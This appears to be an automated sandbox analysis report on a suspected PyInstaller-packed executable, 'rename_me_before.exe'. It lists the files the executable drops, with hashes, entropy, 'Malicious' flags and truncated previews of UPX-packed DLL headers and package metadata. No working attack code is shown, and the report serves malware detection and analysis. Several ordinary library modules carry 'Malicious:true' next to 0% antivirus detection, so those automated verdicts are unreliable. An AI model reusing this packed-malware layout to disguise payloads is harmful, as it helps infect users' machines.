                                                                                                                                                                                                                                                          MD5:9505AFE166EB419F5A1D33FF1254722E
                                                                                                                                                                                                                                                          SHA1:F343D7B444EB58033086DE5376725DEDA5E0E418
                                                                                                                                                                                                                                                          SHA-256:AF42A1C35155EB989332C25A81D6E2ED08D8E33718D18D32BA5B00092F2A0F21
                                                                                                                                                                                                                                                          SHA-512:46B7C86D3384DB9ADB8F1F52B83AAAC398547AB86BC07800B0EB87E9ABEB9D97E24FB8A70F01224D7C4E8A2A532D9353AD1C1F91D0416B429B87EE0EBE1DAEC4
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.+.".E.".E.".E.+...$.E...D. .E...@./.E...A.*.E...F.!.E...D. .E.".D...E.i.D.%.E...H.#.E...E.#.E....#.E...G.#.E.Rich".E.........................PE..d......e.........." ...#.p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\_sqlite3.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):57624
                                                                                                                                                                                                                                                          Entropy (8bit):7.832914003064299
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:1w9DUaMjfQ0G17k3Gq+m3SvZ6XhH60CSLMIVOQZu7Sypx/:GzMjYfwPzR60qIVOQZuB
                                                                                                                                                                                                                                                          MD5:83D8256BC4B9F1FA9FE3B79196166074
                                                                                                                                                                                                                                                          SHA1:2F05420A7C663855F5290FB88CC20A15A7870090
                                                                                                                                                                                                                                                          SHA-256:F63E3BCAD55EF5F5E42076E12730F51BC5B4F3890EB0632A36D2755C5457A57A
                                                                                                                                                                                                                                                          SHA-512:A2E55D4A1A7CA4239E20FAAD4CBB9591C91E245C0D8FCCB01B898DF1C5C4D28010D378B00EC3ABBF973D87F874BB77C02FE0F5D471D47D513A93A4D3C54C94A3
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`.g...g...g.......g.......g.....g.......g.......g.......g..q....g.......g...g...f..q....g..q....g..q..g..q....g..Rich.g..........................PE..d......e.........." ...#.........`.. ....p...................................0............`..........................................+..P....)....... .......................+..$................................... ...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\_ssl.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):66840
                                                                                                                                                                                                                                                          Entropy (8bit):7.864649468753277
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:fbCYwNqce1LbV8uQvTLwNsDgzg+JR15xzf5/5JrwIVC7y3S7Syykx0:fuYwNABQQxzhRTxTx5JcIVC7yCa
                                                                                                                                                                                                                                                          MD5:D8567F88C0C935C77D2258C7C9DB4CA4
                                                                                                                                                                                                                                                          SHA1:1DECC299B3E58F8401264354F3874DD2F0D7CD0A
                                                                                                                                                                                                                                                          SHA-256:9A7E02CF4C66CC6BE6B2BF03282B4D88F16D12EB10EA78F36CDCE0776F6A6289
                                                                                                                                                                                                                                                          SHA-512:FAA5067C4ED2143D316ABF96AE096A1229B7450C9D3A850C496B484794897B246C59716F096806982D9C74CB3799A94C8DDCE646EB990CA89086F8D16D4C5EA9
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U.+.4.x.4.x.4.x.L)x.4.x.H.y.4.x.H.y.4.x.H.y.4.x.H.y.4.xiI.y.4.x.4.x>5.x.L.y.4.xiI.y.4.xiI.y.4.xiIEx.4.xiI.y.4.xRich.4.x................PE..d......e.........." ...#.........@.......P...................................0............`.........................................l,..d....)....... .......................,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\_uuid.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):25368
                                                                                                                                                                                                                                                          Entropy (8bit):6.628339287223099
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:lCfwFpEWjfivQpIVZwobHQIYiSy1pCQFjzuAM+o/8E9VF0NySoJ:4qpEI4QpIVZwg5YiSyvgAMxkE7
                                                                                                                                                                                                                                                          MD5:3A09B6DB7E4D6FF0F74C292649E4BA96
                                                                                                                                                                                                                                                          SHA1:1A515F98946A4DCCC50579CBCEDF959017F3A23C
                                                                                                                                                                                                                                                          SHA-256:FC09E40E569F472DD4BA2EA93DA48220A6B0387EC62BB0F41F13EF8FAB215413
                                                                                                                                                                                                                                                          SHA-512:8D5EA9F7EEE3D75F0673CC7821A94C50F753299128F3D623E7A9C262788C91C267827C859C5D46314A42310C27699AF5CDFC6F7821DD38BF03C0B35873D9730F
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<p.R#.R#.R#...#.R#i.S".R#i.W".R#i.V".R#i.Q".R#..S".R#..S".R#.S#..R#..Z".R#..R".R#...#.R#..P".R#Rich.R#........................PE..d......e.........." ...#.....&...... ........................................p............`.........................................`)..L....)..x....P.......@.......4.../...`..@...`#..T........................... "..@............ ..8............................text...h........................... ..`.rdata....... ......................@..@.data........0.......$..............@....pdata.......@.......&..............@..@.rsrc........P.......(..............@..@.reloc..@....`.......2..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_helpers.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):27136
                                                                                                                                                                                                                                                          Entropy (8bit):7.6999639678226925
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:n7zv9jtkqp8io9lh7cX4fxHCWCvbRQupH:nPvo0q9lZcixHAjRQ2
                                                                                                                                                                                                                                                          MD5:CFCE0B2CFA84C1B1364912E4BFA854F0
                                                                                                                                                                                                                                                          SHA1:92DDADB37B87F54C2C1A244CAB0B51B6FB306EC3
                                                                                                                                                                                                                                                          SHA-256:4C173E67E018DB851A1CCBB21D9163C05B11445BBEEA44E433BFE3B900C82E9C
                                                                                                                                                                                                                                                          SHA-512:932A0CD07B815B5CFA460651C058443454313DE96C694842E0D22BBFBAD3EF2B044624E689DEDE8409182CDDB77583DE22AB2C1FDBE48E69EF4EBD390BF80781
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..X.ux..ux..ux......ux...y..ux.Y.y..ux...}..ux...|..ux...{..ux.(.y..ux..uy..ux.}.p..ux.}.x..ux.}...ux.}.z..ux.Rich.ux.................PE..d......f.........." ...&.p...........C.......................................p............`.........................................@b..`....`..P....`.......................b..$....................................O..@...........................................UPX0....................................UPX1.....p.......b..................@....rsrc........`.......f..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_parser.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):82432
                                                                                                                                                                                                                                                          Entropy (8bit):7.940505498404618
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:+3cl1ibnnh5z7R7rXgoGM0yiSwlwm0eumMbNZPw4BfmLNKalbgEM9xI:+s1ibnnXz7x3GXFSTvegbNVw
                                                                                                                                                                                                                                                          MD5:8FA0C4C34AE5B6BB30F9E063C0D6FF74
                                                                                                                                                                                                                                                          SHA1:81172F9EEB5BA03575232D6C58EE1EC5488B53A2
                                                                                                                                                                                                                                                          SHA-256:89651D43C08734E0B06C9869446461D815EA0D59DCAFDCE340920267108DD218
                                                                                                                                                                                                                                                          SHA-512:F4E122B46E364711BC2CDA034C845369673A2D62B9F2628685E420AE8697FA42CE9E2F678F9030703ECF24FBFCD6CC3E8F7D23ABA5F127C27D679051D8DB1F62
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$...`.Q`.Q`.Qi.0Qf.QfK.Pb.Q+..Pb.QZJ.Pc.Q`.Q..QfK.Pl.QfK.Ph.QfK.Pd.Q.K.Pe.Q.K.Pa.Q.K\Qa.Q.K.Pa.QRich`.Q................PE..d......f.........." ...&.@.......p........................................................`..................................................................@..............\...........................................@...........................................UPX0.....p..............................UPX1.....@.......6..................@....rsrc................:..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_writer.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):25088
                                                                                                                                                                                                                                                          Entropy (8bit):7.667591497071085
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:hTngUVq/M8o0HBUR5Tf490V7w1OMcAwGTtpOnWJKa5yj8pWeh9LWwhTFtSF5XXtt:Zg210+LGcAwU3KyyAt9NTFtSFpTpe
                                                                                                                                                                                                                                                          MD5:5588BE68B4025D1F7D44055A4A5BFB3B
                                                                                                                                                                                                                                                          SHA1:720AC28B851B3B50B058813C67C364DE2EE05CB3
                                                                                                                                                                                                                                                          SHA-256:DD82DAAAEF6677270B80EA23D8DD9BBB62BC8208C2F243E52ABF97751FC94F48
                                                                                                                                                                                                                                                          SHA-512:CDF635F191F5994F4E4CC5373B964A5DB674ABEA144A36492A958B0181B85C85BFED0162EB85D130F822E0D6B0F2180144920DEC356659AD47E475AE70AC9BB1
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f..T"ux."ux."ux.+... ux.$.y. ux.i.y. ux.$.}..ux.$.|.*ux.$.{.!ux...y.!ux."uy..ux.M.p.#ux.M.x.#ux.M..#ux.M.z.#ux.Rich"ux.........PE..d......f.........." ...&.`...........k... ................................................`.........................................@...h.......P............ ..$....................................................w..@...........................................UPX0....................................UPX1.....`... ...Z..................@....rsrc................^..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_websocket.cp311-win_amd64.pyd

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):19968
                                                                                                                                                                                                                                                          Entropy (8bit):7.5808234342652385
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:kC4vtZ/HMOxAOJAslYzehJIjcf3qkcxXUZnv65wjya9m+WvX/Za7gJXDF:I3MVOrYqbIje54532Yvpz
                                                                                                                                                                                                                                                          MD5:6AF681A880D0B41EC16D38F8D7603578
                                                                                                                                                                                                                                                          SHA1:BE92C953F7B4F19763AC768EE961933051E6FCB0
                                                                                                                                                                                                                                                          SHA-256:1211EB2986835D195BC7B80E16F03D5891D7088FE0C3EF19C41C55C517A4082E
                                                                                                                                                                                                                                                          SHA-512:5A38DB40A7A0540D77618D3DCD2CCCACC9EC3A4C4084BDD113ABABDDFC0271F392D0356F0310E6850FC919B5A02099CCE9B2A1490E79CA427784824F188A80C4
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..[.ux..ux..ux......ux...y..ux.Y.y..ux...}..ux...|..ux...{..ux.(.y..ux..uy..ux.}.p..ux.}.x..ux.}...ux.}.z..ux.Rich.ux.................PE..d......f.........." ...&.P..........`.....................................................`.........................................@...d.......P...............4...................................................`...@...........................................UPX0....................................UPX1.....P.......F..................@....rsrc................J..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\attrs-23.2.0.dist-info\INSTALLER

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:pip.

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\attrs-23.2.0.dist-info\METADATA

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (367)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9531
                                                                                                                                                                                                                                                          Entropy (8bit):5.159292758435694
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:LisUYxxPRtXLt5D6kyEqOmoKTYoEJdQ/0GmlWEx+VqAJk6O8mEISuJ5LdYDE:LisTdHyEqHoKtgAml9rAvOsFuJ5L2DE
                                                                                                                                                                                                                                                          MD5:E32D387A89F0114B8F9B9A809905299D
                                                                                                                                                                                                                                                          SHA1:A055C9FBF5416C83D5150D49CA16C58762B8B84A
                                                                                                                                                                                                                                                          SHA-256:5B0BC6ECE1F22A310FA72154642098B759F413F09CA9D45BEDB96218475C9BE0
                                                                                                                                                                                                                                                          SHA-512:6EEE3E19AF46A79E2110678F8D3D15EA4B2EB1355D0FC9581DA2C8E91D28926A2771394EA447E15CBC311A9DD9DE2A20E2AC0E0ABF9DB6D4D51982199A12E881
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: attrs.Version: 23.2.0.Summary: Classes Without Boilerplate.Project-URL: Documentation, https://www.attrs.org/.Project-URL: Changelog, https://www.attrs.org/en/stable/changelog.html.Project-URL: GitHub, https://github.com/python-attrs/attrs.Project-URL: Funding, https://github.com/sponsors/hynek.Project-URL: Tidelift, https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi.Author-email: Hynek Schlawack <hs@ox.cx>.License-Expression: MIT.License-File: LICENSE.Keywords: attribute,boilerplate,class.Classifier: Development Status :: 5 - Production/Stable.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Languag

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\attrs-23.2.0.dist-info\RECORD

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3555
                                                                                                                                                                                                                                                          Entropy (8bit):5.799512812060909
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:QixWFmx02/o/+chE6dwB1NbXmUuAqG2WXJARGD+qLtxO:qMJchiRXnuA/XJSiO
                                                                                                                                                                                                                                                          MD5:0461AB56C7D588C2D9596F91E16658EC
                                                                                                                                                                                                                                                          SHA1:013E2923CAC817D68EE9ECF9A812E41707C4C7FD
                                                                                                                                                                                                                                                          SHA-256:A6DE30062543C20B137871403F784F12622118583313E9288A9389C005DE59AF
                                                                                                                                                                                                                                                          SHA-512:DD217FCCDD005EC00C34621EDD879A6DAC57F11065DDD628D0166FC3F2D78F32E282CCA86AEAB71D80928D834657A1E1D8D704F2A3BEF98410EE2D2E614A9590
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:attr/__init__.py,sha256=WlXJN6ICB0Y_HZ0lmuTUgia0kuSdn2p67d4N6cYxNZM,3307..attr/__init__.pyi,sha256=u08EujYHy_rSyebNn-I9Xv2S_cXmtA9xWGc0cBsyl18,16976..attr/__pycache__/__init__.cpython-311.pyc,,..attr/__pycache__/_cmp.cpython-311.pyc,,..attr/__pycache__/_compat.cpython-311.pyc,,..attr/__pycache__/_config.cpython-311.pyc,,..attr/__pycache__/_funcs.cpython-311.pyc,,..attr/__pycache__/_make.cpython-311.pyc,,..attr/__pycache__/_next_gen.cpython-311.pyc,,..attr/__pycache__/_version_info.cpython-311.pyc,,..attr/__pycache__/converters.cpython-311.pyc,,..attr/__pycache__/exceptions.cpython-311.pyc,,..attr/__pycache__/filters.cpython-311.pyc,,..attr/__pycache__/setters.cpython-311.pyc,,..attr/__pycache__/validators.cpython-311.pyc,,..attr/_cmp.py,sha256=OQZlWdFX74z18adGEUp40Ojqm0NNu1Flqnv2JE8B2ng,4025..attr/_cmp.pyi,sha256=sGQmOM0w3_K4-X8cTXR7g0Hqr290E8PTObA9JQxWQqc,399..attr/_compat.py,sha256=QmRyxii295wcQfaugWqxuIumAPsNQ2-RUF82QZPqMKw,2540..attr/_config.py,sha256=z81Vt-GeT_2taxs1XZfmHx9TWlSxjP

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\attrs-23.2.0.dist-info\WHEEL

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):87
                                                                                                                                                                                                                                                          Entropy (8bit):4.699003560068366
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:RtEeXAaCTUhvhjP+tPCCfA5I:Rt2PYhvxWBB3
                                                                                                                                                                                                                                                          MD5:C58F7D318BAA542F6BFD220F837AB63F
                                                                                                                                                                                                                                                          SHA1:F655FC3C0EB1BF12629C5750B2892BD896C3E7D9
                                                                                                                                                                                                                                                          SHA-256:99161210BDC887A8396BF095308730885FFFD007B8FE02D8874D5814DC22AB59
                                                                                                                                                                                                                                                          SHA-512:3DA6980A39C368AB7F7527FCD5FCDAA9D321060174BAAE163BF73F8052A2AC1A73F476C3882855965DFC2CB13C7C3EC1A012882201389DAC887F9BE59540C80F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: hatchling 1.21.0.Root-Is-Purelib: true.Tag: py3-none-any.

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\attrs-23.2.0.dist-info\licenses\LICENSE

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1109
                                                                                                                                                                                                                                                          Entropy (8bit):5.104415762129373
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:bGf8rUrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:bW8rUaJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                                                          MD5:5E55731824CF9205CFABEAB9A0600887
                                                                                                                                                                                                                                                          SHA1:243E9DD038D3D68C67D42C0C4BA80622C2A56246
                                                                                                                                                                                                                                                          SHA-256:882115C95DFC2AF1EEB6714F8EC6D5CBCABF667CAFF8729F42420DA63F714E9F
                                                                                                                                                                                                                                                          SHA-512:21B242BF6DCBAFA16336D77A40E69685D7E64A43CC30E13E484C72A93CD4496A7276E18137DC601B6A8C3C193CB775DB89853ECC6D6EB2956DEEE36826D5EBFE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:The MIT License (MIT)..Copyright (c) 2015 Hynek Schlawack and the attrs contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHE

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1440734
                                                                                                                                                                                                                                                          Entropy (8bit):5.590383253842785
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:mQR5pATG8/R5lUKdcubgAnyfb8h30iwhBdYf9PfeYHHc:mQR5pE/RbPu
                                                                                                                                                                                                                                                          MD5:D220B7E359810266FE6885A169448FA0
                                                                                                                                                                                                                                                          SHA1:556728B326318B992B0DEF059ECA239EB14BA198
                                                                                                                                                                                                                                                          SHA-256:CA40732F885379489D75A2DEC8EB68A7CCE024F7302DD86D63F075E2745A1E7D
                                                                                                                                                                                                                                                          SHA-512:8F802C2E717B0CB47C3EEEA990FFA0214F17D00C79CE65A0C0824A4F095BDE9A3D9D85EFB38F8F2535E703476CB6F379195565761A0B1D738D045D7BB2C0B542
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info\INSTALLER

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:pip.

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info\LICENSE

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):197
                                                                                                                                                                                                                                                          Entropy (8bit):4.61968998873571
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                                                                                                                                                                          MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                                                                                                                          SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                                                                                                                                                                          SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                                                                                                                          SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info\LICENSE.APACHE

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
